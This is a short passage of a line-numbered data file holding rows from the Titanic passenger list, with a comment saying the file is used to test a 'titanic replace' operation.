"Rice_Master.Eugene" male 2 4 1 382652 29.125 Null Q 20 | 18 1 2 "Williams_Mr.Charles_Eugene" male 28 0 0 244373 13 Null S 21 | 19 0 3 "Vander_Planke_Mrs.Julius_(Emelia_Maria_Vandemoortele)" female 31 1 0 345763 18 Null S 22 | 20 1 3 "Masselmani_Mrs.Fatima" female 33 0 0 2649 7.225 Null C 23 | #TITANIC titanic file is used to test titanic replace TITANIC 24 | 25 | --------------------------------------------------------------------------------